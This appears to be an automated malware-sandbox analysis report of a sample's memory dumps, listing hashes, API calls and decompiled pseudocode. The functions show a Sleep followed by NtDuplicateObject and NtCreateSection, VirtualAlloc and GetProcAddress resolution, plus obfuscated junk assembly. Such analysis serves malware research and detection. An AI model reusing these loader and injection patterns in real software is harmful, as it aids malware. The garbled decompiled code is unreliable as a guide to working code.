Instruction ID: 821b0d10a87f8ebea7d35f23d7e2e973144a2f41bdb8f2b8da3a1113d8856595
Opcode Fuzzy Hash: fc4b47963422dcefc7eb3c8f01a7b8c00c64b8d35549142067844c51b0883b8d
Instruction Fuzzy Hash: 7F510773904144EBEB25AA55C844FAB77B5EF91300F28813BE842772F0D63C5A42D75B

Uniqueness

Uniqueness Score: -1.00%

Function 02C0003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C0024D

Strings

cess, xrefs: 02C0018D
kernel32.dll, xrefs: 02C0008F, 02C00095

Memory Dump Source

Source File: 00000000.00000002.422539917.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: ee16260cd56aa2fd5db83df38fb3b137753abf148505c339521b0eb4c317841e
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 7C526A74A01229DFDB64CF58C984BACBBB1BF09304F1580D9E94DAB391DB30AA85DF15

Uniqueness

Uniqueness Score: -1.00%

Function 02C00E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02C00223,?,?), ref: 02C00E19
SetErrorMode.KERNELBASE(00000000,?,?,02C00223,?,?), ref: 02C00E1E

Memory Dump Source

Source File: 00000000.00000002.422539917.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 819b0beab05707b658fc08e96ca4ef21d9c7a36719b17af592760c3b4b3db003
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 0FD01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4046EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA51 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__malloc_crt.LIBCMT ref: 0040BA82

Memory Dump Source

Source File: 00000000.00000002.421446652.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: __malloc_crt
String ID:
API String ID: 3464615804-0
Opcode ID: d2e1470bf1e14fee2f364b4b2cba28523d35b5fbdd86699027dbd1e69513b5c9
Instruction ID: 323b23f4980721603d1b81e7f4a00e8822b399017b87e822afdf0d267b719a7f
Opcode Fuzzy Hash: d2e1470bf1e14fee2f364b4b2cba28523d35b5fbdd86699027dbd1e69513b5c9
Instruction Fuzzy Hash: 2EF0E2B67041206ACB2076357C458771228DACA329316483BF892E3290E7384E834AFC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C097 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040C0AC

Memory Dump Source

Source File: 00000000.00000002.421446652.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 946429e41a207e3580989b5d0d70526d6c9ba7e364734d260efe7e4813abf738
Instruction ID: 3a6d5b6f7e7fdacef3b44ab4ddaca668afc427c856f8126fee3b79d36973f55a
Opcode Fuzzy Hash: 946429e41a207e3580989b5d0d70526d6c9ba7e364734d260efe7e4813abf738
Instruction Fuzzy Hash: F7D05E729903459ADB10AFB1AC49B723BDCD3887D5F108836F91CC7690E674C560CA44

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB6C Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__encode_pointer.LIBCMT ref: 0040BB6E

Part of subcall function 0040BAFA: RtlEncodePointer.NTDLL(00000000,?,0040BB73,00000000,00410E3D,02B8EBD0,00000000,00000314,?,0040B558,02B8EBD0,00401EE8,00012010), ref: 0040BB61

Memory Dump Source

Source File: 00000000.00000002.421446652.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: eb4c04dab62c67ba7530d716b90cb2f1624144ac0887d613fde26541813fc3e3
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004019F2 Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004019F2(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t8;
				char* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				void* _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;
				void* _t24;

				_t8 = 0x1a3f;
				_push(0x6c);
				_t15 =  *_t21;
				_t22 = _t21 + 4;
				_push(0xad);
				_t17 =  *_t22;
				L004012A4(_t8, _t13, _t15, _t17, _t19, _t20, _t24);
				_t14 = _a4;
				Sleep(0x1388);
				_t9 =  &_v8;
				_push(_t9);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				E00401521(); // executed
				_t25 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9, _v8, _a16); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t19, _t20, _t25);
				return 0x1a3f;
			}

0x00401a07
0x00401a14
0x00401a16
0x00401a19
0x00401a28
0x00401a2d
0x00401a3a
0x00401a3f
0x00401a47
0x00401a4a
0x00401a4d
0x00401a4e
0x00401a51
0x00401a54
0x00401a55
0x00401a5a
0x00401a5c
0x00401a66
0x00401a66
0x00401a6f
0x00401aa6
0x00401aaf

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 7ad253cd71c6769f5a407361799426ff06398afbb16f5778e98e9b3cec4ba55c
Instruction ID: 25844bbcf1cbe2862b2fc1e39125094b9f234e696ff082aa1ccfa1e087edcb68
Opcode Fuzzy Hash: 7ad253cd71c6769f5a407361799426ff06398afbb16f5778e98e9b3cec4ba55c
Instruction Fuzzy Hash: 7301AD3170A205EBEB00AA948D41EBB32299F85314F3404B7BA53B91F1D67D89136F6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0A Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E00401A0A() {
				void* _t8;
				void* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t27;
				void* _t30;

				asm("adc al, ah");
				_t8 = 0x1a3f;
				_push(0x6c);
				_t16 =  *_t26;
				_t27 = _t26 + 4;
				_push(0xad);
				_t18 =  *_t27;
				L004012A4(_t8, _t13, _t16, _t18, _t20, _t22, _t30);
				_t14 =  *((intOrPtr*)(_t24 + 8));
				Sleep(0x1388);
				_t9 = _t24 - 4;
				_push(_t9);
				_push( *((intOrPtr*)(_t24 + 0x10)));
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_t14); // executed
				E00401521(); // executed
				_t31 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9,  *((intOrPtr*)(_t24 - 4)),  *((intOrPtr*)(_t24 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t20, _t22, _t31);
				return 0x1a3f;
			}

0x00401a0a
0x00401a07
0x00401a14
0x00401a16
0x00401a19
0x00401a28
0x00401a2d
0x00401a3a
0x00401a3f
0x00401a47
0x00401a4a
0x00401a4d
0x00401a4e
0x00401a51
0x00401a54
0x00401a55
0x00401a5a
0x00401a5c
0x00401a66
0x00401a66
0x00401a6f
0x00401aa6
0x00401aaf

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 2acbda75c9dd3b6b70a326b48304a4ddcdc6a07758558ebcc5b2723483e045e0
Instruction ID: d8c634ebd0fb47f8dbfc2dcf49b775dfd32c4584f4b3c73897dcc7655f38e994
Opcode Fuzzy Hash: 2acbda75c9dd3b6b70a326b48304a4ddcdc6a07758558ebcc5b2723483e045e0
Instruction Fuzzy Hash: A6014C3270A205EBDB009A948D41BBA32159F85314F3444B7BA53B91F1D67E89136F2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 54
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00401A01(void* __ecx) {
				void* _t8;
				void* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t24;
				void* _t26;
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t32;

				_t32 = __ecx - 1;
				_t8 = 0x1a3f;
				_push(0x6c);
				_t18 =  *_t28;
				_t29 = _t28 + 4;
				_push(0xad);
				_t20 =  *_t29;
				L004012A4(_t8, _t13, _t18, _t20, _t22, _t24, _t32);
				_t14 =  *((intOrPtr*)(_t26 + 8));
				Sleep(0x1388);
				_t9 = _t26 - 4;
				_push(_t9);
				_push( *((intOrPtr*)(_t26 + 0x10)));
				_push( *((intOrPtr*)(_t26 + 0xc)));
				_push(_t14); // executed
				E00401521(); // executed
				_t33 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t22, _t24, _t33);
				return 0x1a3f;
			}

0x00401a01
0x00401a07
0x00401a14
0x00401a16
0x00401a19
0x00401a28
0x00401a2d
0x00401a3a
0x00401a3f
0x00401a47
0x00401a4a
0x00401a4d
0x00401a4e
0x00401a51
0x00401a54
0x00401a55
0x00401a5a
0x00401a5c
0x00401a66
0x00401a66
0x00401a6f
0x00401aa6
0x00401aaf

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 949b325ddbe82bc9e2a83b7552eeaae9020fa5dd3578ed03a8661c1f145a6485
Instruction ID: bb8f854860517b91ef23627f573853fa0fc08e5855f63139474b369349933f98
Opcode Fuzzy Hash: 949b325ddbe82bc9e2a83b7552eeaae9020fa5dd3578ed03a8661c1f145a6485
Instruction Fuzzy Hash: D9015E3170A201EBEB009AD48D41BBA32159F85314F3444B7BA53B91F1D67E89136F2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0E Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E00401A0E() {
				void* _t8;
				void* _t9;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t27;
				void* _t30;

				asm("adc ch, bl");
				_push(0x6c);
				_t16 =  *_t26;
				_t27 = _t26 + 4;
				_push(0xad);
				_t18 =  *_t27;
				L004012A4(_t8, _t13, _t16, _t18, _t20, _t22, _t30);
				_t14 =  *((intOrPtr*)(_t24 + 8));
				Sleep(0x1388);
				_t9 = _t24 - 4;
				_push(_t9);
				_push( *((intOrPtr*)(_t24 + 0x10)));
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_t14); // executed
				E00401521(); // executed
				_t31 = _t9;
				if(_t9 != 0) {
					E00401615(_t14, _t9,  *((intOrPtr*)(_t24 - 4)),  *((intOrPtr*)(_t24 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				L004012A4(0x1a3f, _t14, 0x6c, 0xad, _t20, _t22, _t31);
				return 0x1a3f;
			}

0x00401a0e
0x00401a14
0x00401a16
0x00401a19
0x00401a28
0x00401a2d
0x00401a3a
0x00401a3f
0x00401a47
0x00401a4a
0x00401a4d
0x00401a4e
0x00401a51
0x00401a54
0x00401a55
0x00401a5a
0x00401a5c
0x00401a66
0x00401a66
0x00401a6f
0x00401aa6
0x00401aaf

APIs

Sleep.KERNELBASE(00001388,000000AD), ref: 00401A47

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3610154dd3eda8e1f1c0e96eb824f9203b9b722972d870a07033dd98430c117a
Instruction ID: 2e2055f9db7f7bfa196961a35f33946421e8fe2f98abc4ca2717ed5341f40e74
Opcode Fuzzy Hash: 3610154dd3eda8e1f1c0e96eb824f9203b9b722972d870a07033dd98430c117a
Instruction Fuzzy Hash: C401713170A201EBDB00AAD4CD41BBA32259F86314F2444B7BA53B91F1D67D8913AF2F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02C0092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02C00966
GetProcAddress., xrefs: 02C009DC, 02C009DF, 02C009E4
., xrefs: 02C0095F

Memory Dump Source

Source File: 00000000.00000002.422539917.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 7fdc5a998f08dd725fc290dd9f88b3770629b439646e2813389a99b8e401b4bd
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 7D3138B6910609DFDB10CF99C880BAEBBF9FF48324F15414AD841A7250D771EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403428 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

t, xrefs: 00403434
b, xrefs: 00403507

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: b$t
API String ID: 0-311595743
Opcode ID: fa056358833477db70fd5b1ffba56fe8e7436a95b35f56d64ff2530caa2a2b0b
Instruction ID: 32a1c5afed094e47055991f7f524925e091c50c5a284efc56750769d321858da
Opcode Fuzzy Hash: fa056358833477db70fd5b1ffba56fe8e7436a95b35f56d64ff2530caa2a2b0b
Instruction Fuzzy Hash: 1A31276188E7D04FD713CB7849962953F759A2326AB8C41EBC1D4EF2E3D22C450BC36A

Uniqueness

Uniqueness Score: -1.00%

Function 004026C4 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E004026C4(intOrPtr __eax, void* __ebx, signed int __ecx, void* __edx, signed int* __edi, unsigned char* __esi) {
				signed int _t32;
				signed int _t33;
				signed char _t35;
				signed int _t37;
				signed char _t39;
				signed char _t40;
				signed char _t41;
				signed char _t42;
				signed int _t44;
				signed int _t47;
				signed int _t48;
				unsigned char _t56;
				signed int _t61;
				signed char _t63;
				signed char _t64;
				void* _t73;
				void* _t74;
				signed int* _t76;
				signed int* _t79;
				unsigned char* _t81;
				void* _t89;
				signed int _t113;
				signed int _t114;

				_t81 = __esi;
				_t61 = __ecx;
				asm("popfd");
				 *0xa29327ac = __eax;
				 *0xa2a7cba3 = __eax;
				 *0x5ce3c9a3 = __eax;
				asm("lock wait");
				_t32 = __eax - __edx;
				asm("cmc");
				asm("repe pop esp");
				asm("lock mov ebx, [esi+edx*8+0x4b]");
				_t63 = _t32 *  *[cs:edi-0xf] >> 0x20;
				_t33 = _t32 *  *[cs:edi-0xf];
				asm("lock scasd");
				asm("out 0x67, al");
				asm("fisubr word [cs:edi+0x64]");
				asm("movsb");
				asm("in al, 0xa7");
				 *0x2aa3a3a3 = _t33;
				asm("in al, 0xab");
				asm("in al, 0xaf");
				asm("jecxz 0xffffffa5");
				 *0xb3e464a3 = _t33;
				 *0x64a3a3a3 = _t33;
				asm("in al, 0xb7");
				 *0xf4a3a3a3 = _t33;
				asm("stosb");
				 *__edi =  *__edi ^ __ecx;
				 *0x6326a3a3 = _t33;
				asm("lodsb");
				 *[gs:0xf62ea3a3] = _t33;
				asm("int1");
				 *0xa1c9a3c9 = _t33;
				asm("salc");
				 *0x64a3a3a3 =  *0x64a3a3a3 ^ _t63;
				 *0xde20a3a3 = _t33;
				_t73 = __edi - 1 + 1 - 1;
				 *0xa30027ac = _t33;
				 *0x4fd65ca3 = _t33;
				asm("jecxz 0x5e");
				asm("lock wait");
				_push(_t73);
				asm("salc");
				_t74 = _t73 - 1;
				asm("salc");
				_push(_t74);
				_t35 =  *0x5c47d65c;
				 *0x64a3a3a3 =  *0x64a3a3a3 ^ _t63;
				 *0x6326a3a3 = _t35;
				asm("salc");
				asm("fisub dword [eax]");
				asm("fimul word [edi-0x5d]");
				asm("xlatb");
				 *_t35 =  *_t35 >> 1;
				asm("out 0x57, al");
				_t56 = 0x2a;
				asm("out 0x5b, al");
				_t64 = _t35;
				_t37 = _t63;
				asm("ficomp word [ebx-0x30]");
				 *__esi =  *__esi >> 0xf6;
				asm("int1");
				 *0xa3c9a3c9 = _t37;
				asm("hlt");
				asm("salc");
				_t76 = _t74 - 1 + 1;
				 *_t76 =  *_t76 ^ _t64;
				 *0xde20a3a3 = _t37;
				 *0xe620e5d7 = _t37;
				asm("jecxz 0x5e");
				asm("lock wait");
				_t39 =  *0xc94fd65c - _t64;
				_push(0x64a3a3a3);
				asm("salc");
				_t79 = _t76 - 0xffffffffffffffff;
				asm("salc");
				_t89 = 0x64a3a3a3;
				 *0x47d65cf4 = _t39;
				 *_t79 =  *_t79 ^ _t64;
				 *0x6326a3a3 = _t39;
				asm("salc");
				_t40 = 0x20;
				asm("fimul word [edi-0x5d]");
				asm("xlatb");
				asm("out 0x53, al");
				do {
					asm("jecxz 0xffffffb6");
					asm("lock repe dec ebx");
					_t81[0x53 + _t81[0x5c] * 0xd763265c * 8] = _t56;
					asm("lock lahf");
					asm("in al, 0x48");
					asm("lock lahf");
					asm("salc");
					_t79 =  &(_t79[0]);
					asm("lock cmpsd");
					asm("salc");
					asm("lock lahf");
					 *(_t89 - 0x37) =  *(_t89 - 0x37) & _t40;
					_pop(_t89);
					_pop(_t113);
					_t41 = _t40 - 1;
					asm("movsb");
					asm("out 0x5f, al");
					 *0x48a3a3a3 = _t41;
					asm("salc");
					asm("a16 dec ecx");
					asm("retf");
					_t42 = _t41 |  *(_t81 - 0x58d75c5d);
					_t114 =  *_t42;
					 *_t42 = _t113;
					asm("a16 cmpsd");
					asm("cmpsb");
					_t61 = _t61 - 1;
					asm("int1");
					_t40 = _t42;
					_t56 = 0xd2;
					asm("loope 0xffffffbf");
				} while (_t40 <= 0);
				asm("retf");
				 *(_t61 - 0x50d75c5d) =  *(_t61 - 0x50d75c5d) | _t114;
				_t44 =  *0xaf28a3a3;
				 *_t44 = _t114;
				asm("a16 cmpsd");
				asm("cmpsb");
				_t47 = _t44 & 0x00000048;
				 *((char*)(_t47 - 0x4f)) =  *((char*)(_t47 - 0x4f)) - 1;
				_t48 = _t47 | 0xa3a300cb;
				 *0x2087b728 = _t48;
				asm("a16 cmpsd");
				asm("cmpsb");
				asm("retf");
				 *0x4bb64c48 = _t48 - 1;
				asm("repne dec ecx");
				return  *((intOrPtr*)(_t89 - 4));
			}

0x004026c4
0x004026c4
0x004026c4
0x004026c5
0x004026ca
0x004026cf
0x004026d4
0x004026d6
0x004026d9
0x004026da
0x004026dc
0x004026e1
0x004026e1
0x004026e6
0x004026e8
0x004026eb
0x004026ef
0x004026f5
0x004026f7
0x004026fc
0x004026fe
0x00402701
0x00402703
0x00402708
0x0040270d
0x0040270f
0x00402715
0x0040271b
0x0040271d
0x00402722
0x00402723
0x0040272b
0x0040272d
0x00402733
0x00402736
0x00402738
0x0040273d
0x0040273e
0x00402743
0x00402749
0x0040274b
0x0040274f
0x00402755
0x00402756
0x00402758
0x00402759
0x0040275b
0x00402760
0x00402762
0x00402767
0x00402768
0x0040276a
0x0040276d
0x0040276e
0x00402770
0x00402774
0x00402776
0x00402778
0x0040277a
0x0040277b
0x0040277e
0x00402782
0x00402784
0x00402789
0x0040278b
0x0040278c
0x0040278e
0x00402790
0x00402796
0x004027a1
0x004027a3
0x004027a5
0x004027a7
0x004027ad
0x004027ae
0x004027b0
0x004027b2
0x004027b3
0x004027b9
0x004027bb
0x004027c0
0x004027c1
0x004027c3
0x004027c6
0x004027c9
0x004027cb
0x004027cb
0x004027ce
0x004027d8
0x004027dd
0x004027df
0x004027e6
0x004027e9
0x004027ea
0x004027ec
0x004027ef
0x004027f2
0x004027f4
0x004027f8
0x004027fb
0x004027fc
0x004027fd
0x004027fe
0x00402801
0x00402808
0x00402809
0x0040280c
0x0040280d
0x00402813
0x00402813
0x00402815
0x00402818
0x00402819
0x0040281d
0x0040281e
0x0040281f
0x00402821
0x00402821
0x00402825
0x00402826
0x00402827
0x0040282c
0x0040282e
0x00402831
0x00402833
0x00402836
0x0040283b
0x00402840
0x00402845
0x00402848
0x00402849
0x0040284a
0x0040284f
0x0040285a

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4f54fb983197cb2f23b4d4a42d85e37763b476765589012e5011dbde092c076
Instruction ID: 2f81f82392092d9a1f00e1de40be048973543ec3616208dddd654e65d5dcf6d9
Opcode Fuzzy Hash: d4f54fb983197cb2f23b4d4a42d85e37763b476765589012e5011dbde092c076
Instruction Fuzzy Hash: BF4125BA404B528FC701EF34D44A6E7BFE1EB96B253044BBFC5828BA82E7714051DB52

Uniqueness

Uniqueness Score: -1.00%

Function 0040280D Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E0040280D(signed int __eax, void* __ecx, void* __edx, void* __esi) {
				signed char _t21;
				signed char _t23;
				signed int _t25;
				signed int _t28;
				signed int _t29;
				void* _t39;
				void* _t50;
				void* _t51;
				void* _t53;
				signed int _t62;

				L0:
				while(1) {
					L0:
					_t21 = __eax |  *(__esi - 0x58d75c5d);
					 *_t21 = _t53;
					asm("a16 cmpsd");
					asm("cmpsb");
					_t39 = __ecx - 1;
					asm("int1");
					_t23 = _t21;
					asm("loope 0xffffffbf");
					if(_t23 > 0) {
						break;
					}
					L1:
					asm("jecxz 0xffffffb6");
					asm("lock repe dec ebx");
					 *((intOrPtr*)(__esi + 0x53 +  *(__esi + 0x5c) * 0xd763265c * 8)) = 0xd2;
					asm("lock lahf");
					asm("in al, 0x48");
					asm("lock lahf");
					asm("salc");
					asm("lock cmpsd");
					asm("salc");
					asm("lock lahf");
					 *(_t50 - 0x37) =  *(_t50 - 0x37) & _t23;
					_pop(_t51);
					_pop(_t62);
					asm("movsb");
					asm("out 0x5f, al");
					 *0x48a3a3a3 = _t23 - 1;
					asm("salc");
					asm("a16 dec ecx");
					asm("retf");
				}
				L2:
				asm("retf");
				 *(_t39 - 0x50d75c5d) =  *(_t39 - 0x50d75c5d) | _t62;
				_t25 =  *0xaf28a3a3;
				 *_t25 = _t62;
				asm("a16 cmpsd");
				asm("cmpsb");
				_t28 = _t25 & 0x00000048;
				 *((char*)(_t28 - 0x4f)) =  *((char*)(_t28 - 0x4f)) - 1;
				_t29 = _t28 | 0xa3a300cb;
				 *0x2087b728 = _t29;
				asm("a16 cmpsd");
				asm("cmpsb");
				asm("retf");
				 *0x4bb64c48 = _t29 - 1;
				asm("repne dec ecx");
				return  *((intOrPtr*)(_t51 - 4));
			}

0x0040280d
0x0040280d
0x0040280d
0x0040280d
0x00402813
0x00402815
0x00402818
0x00402819
0x0040281d
0x0040281e
0x00402821
0x00402823
0x00000000
0x00000000
0x004027cb
0x004027cb
0x004027ce
0x004027d8
0x004027dd
0x004027df
0x004027e6
0x004027e9
0x004027ec
0x004027ef
0x004027f2
0x004027f4
0x004027f8
0x004027fb
0x004027fd
0x004027fe
0x00402801
0x00402808
0x00402809
0x0040280c
0x0040280c
0x00402825
0x00402825
0x00402826
0x00402827
0x0040282c
0x0040282e
0x00402831
0x00402833
0x00402836
0x0040283b
0x00402840
0x00402845
0x00402848
0x00402849
0x0040284a
0x0040284f
0x0040285a

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4337e8f659fef2a82c794223b827c6d674eb0096de8d6ed411ff0e39ecd6e72
Instruction ID: 284c72494f5cabb3a7d88a9704bf72677b6f03674bfb4a2570117764be1e464e
Opcode Fuzzy Hash: c4337e8f659fef2a82c794223b827c6d674eb0096de8d6ed411ff0e39ecd6e72
Instruction Fuzzy Hash: 6EF02B26021E584DC222FB3475432F17F90E6867653540B9FC082A3C83C09140848BC2

Uniqueness

Uniqueness Score: -1.00%

Function 02C00D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.422539917.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 3ba0e69ab0e5c57e64782a7512743d3c25089ef76b59ee3179ddb873e6177c69
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 9501A7766106048FDF21CF24C844BAA33E5EBC5215F4644A5D516972C2E774AA41CF90

Uniqueness
